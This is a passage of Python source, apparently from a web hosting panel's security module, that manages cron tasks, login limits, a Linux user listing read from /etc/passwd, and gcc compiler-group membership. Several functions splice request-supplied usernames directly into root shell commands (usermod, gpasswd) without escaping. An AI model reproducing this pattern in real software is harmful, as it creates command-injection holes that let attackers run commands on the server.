public.ExecShell('which python')[0].strip("\n") except: pass if not python_path: return False count=public.M('crontab').where('name=?',(cron_name,)).count() if count>1: cron_echo = public.M('crontab').where( "name=?", (cron_name, )).getField('echo') cron_id = public.M('crontab').where( "echo=?", (cron_echo, )).getField('id') args = {"id": cron_id} import crontab crontab.crontab().DelCrontab(args) del_cron_file = cron_path + cron_echo public.ExecShell( "crontab -u root -l| grep -v '{}'|crontab -u root -". format(del_cron_file)) if not public.M('crontab').where('name=?', (cron_name, )).count(): cmd = '{} {}'.format(python_path, self.__script_py) args = { "name": cron_name, "type": 'minute-n', "where1": '1', "hour": '', "week":'', "minute": '', "sName": "", "sType": 'toShell', "notice": '', "notice_channel": '', 'datab_name':'', 'tables_name':'', "save": '', "save_local": '1', "backupTo": '', "sBody": cmd, "urladdress": '' } import crontab res = crontab.crontab().AddCrontab(args) if res and "id" in res.keys(): return True return False return True def get_protected_services(self,get): """ @name 获取防护配置 """ result={'based_on_username':['aapanel'],'based_on_ip':['ssh']} return public.return_message(0,0,result) def get_login_limit(self): """ @name 获取登录限制配置 """ self._config=self.read_config() if not self._config['global_status'] or not self._config['username_status']:return False #防爆破检测 now_time=limit_time=time.time() white_ips='' _limit_login='{}/data/limit_login.pl'.format(public.get_panel_path()) breaking_white='{}/data/breaking_white.conf'.format(public.get_panel_path()) #获取限制时间 try: limit_time=float(public.readFile(_limit_login)) if os.path.exists(breaking_white): limit_time=float(public.readFile(_limit_login)) if os.path.exists(breaking_white): white_ips+=public.readFile(breaking_white) except:pass intranet_local_ip=public.get_local_ip() if intranet_local_ip=='':intranet_local_ip=public.get_local_ip_2() from BTPanel import session if 'address' not in session: session['address']=public.GetClientIp() if now_time<limit_time and (white_ips=='' or session['address'] not in white_ips and intranet_local_ip not in white_ips): return True return False def get_linux_users(self,get): """ @name 获取linux用户列表信息 """ #取用户列表 user_list=[] user_exec=public.ExecShell('cat /etc/passwd')[0].strip() try: tmp_list=user_exec.split('\n') for i in tmp_list: i_strip=i.strip() if i_strip=='':continue user_list.append(i_strip.split(':',1)[0]) except:pass #取分页数据 data = self.get_page(get,user_list) return public.return_message(0,0,data) def get_page(self,get,result): """ @name 取分页信息 """ #取分页数据 import page page = page.Page() info = {} info['count'] = len(result) info['row'] = 10 info['p'] = 1 if hasattr(get, 'p'): info['p'] = int(get['p']) if hasattr(get, 'limit'): info['row'] = int(get['limit']) info['uri'] = get info['return_js'] = '' if hasattr(get, 'tojs'): info['return_js'] = get.tojs data = {} # 获取分页数据 data['data']=[] data['page'] = page.GetPage(info, '1,2,3,4,5,8') start = (info['p']-1)*info['row'] end= info['p']*info['row']-1 for index in range(len(result)): if index<start:continue if index >end:continue data['data'].append(result[index]) return data def get_compiler_info(self,get): """ @name 获取编译器组内成员信息 """ complier_members=[] try: group_exec=public.ExecShell('grep '+self.__complier_group+' /etc/group')[0].strip() group_string=group_exec.split(':')[3].strip() if group_string!='': complier_members=group_exec.split(':')[3].split(',') except:pass #取分页数据 data = self.get_page(get,complier_members) return public.return_message(0,0,data) def init_complier(self): """ @name 初始化编译器组 """ #读取配置文件/etc/group if os.path.exists('/etc/group'): groupContent = public.readFile('/etc/group') if groupContent.find(self.__complier_group+":x:") == -1: public.ExecShell('groupadd '+self.__complier_group) try: file_stat = os.stat(self.__gcc_path) gid=file_stat.st_gid import grp group_name=grp.getgrgid(gid).gr_name if group_name!=self.__complier_group: public.ExecShell('chgrp '+self.__complier_group+' '+self.__gcc_path) except:pass def add_user_to_compiler(self,get): """ @name 添加指定用户到编译器组 """ self.init_complier() if 'users' not in get:return public.return_message(-1, 0, public.lang("parameter error")) try: if type(get.users)==str: import ast get.users=ast.literal_eval(get.users) except:pass add_users=get.users get.limit=10000 complier_members=self.get_compiler_info(get)['message']['data'] for add_user in add_users: try: if (len(complier_members)>0 and add_user not in complier_members) or len(complier_members)<1: public.ExecShell('usermod -aG '+self.__complier_group+' '+add_user) # complier_members=self.get_compiler_info(get)['message']['data'] # public.print_log('complier_members2:{}'.format(complier_members)) # if add_user in complier_members:return public.return_message(0, 0, public.lang("Added successfully")) except:pass #写日志 if self.__write_log: public.write_log_gettext(self.__log_type, 'Successfully added users [{}] to the compiler group', (','.join(add_users),)) return public.return_message(0, 0, public.lang("Operation executed")) def del_user_to_compiler(self,get): """ @name 删除编译器组内指定用户 """ if 'user' not in get or get.user.strip()=='':return public.return_message(-1, 0, public.lang("parameter error")) del_user=get.user.strip() get.limit=10000 complier_members=self.get_compiler_info(get)['message']['data'] try: if len(complier_members)>0 and del_user in complier_members: public.ExecShell('gpasswd -d '+del_user+' '+self.__complier_group) complier_members=self.get_compiler_info(get)['message']['data'] if len(complier_members)>0 and del_user in complier_members:return public.return_message(-1, 0, public.lang("Delete failed")) except:pass #写日志 if self.__write_log: public.write_log_gettext(self.__log_type, 'User [{}] successfully removed from compiler group', (del_user,)) return public.return_message(0, 0, public.lang("Delete successfully")) def set_compiler_status(self,get): """ @name 为编译器其他用户设置状态 @param get.status 0关闭 1开启 不传此参数时,仅获取状态,不设置状态 """ chmod_limt='0750' log_string={'0750':'closed','0755':'enabled'} if 'status' in get: if int(get.status)==1:chmod_limt='0755' public.ExecShell('chmod '+chmod_limt+' '+self.__gcc_path) #写日志 if self.__write_log: public.write_log_gettext(self.__log_type, 'Non privileged user successfully {} gcc compiler', (log_string[chmod_limt],)) limit_status=False try: accept=oct(os.stat(self.__gcc_path).st_mode)[-4:] if accept=='0755':limit_status=True except:pass return public.return_message(0,0,limit_status)
Close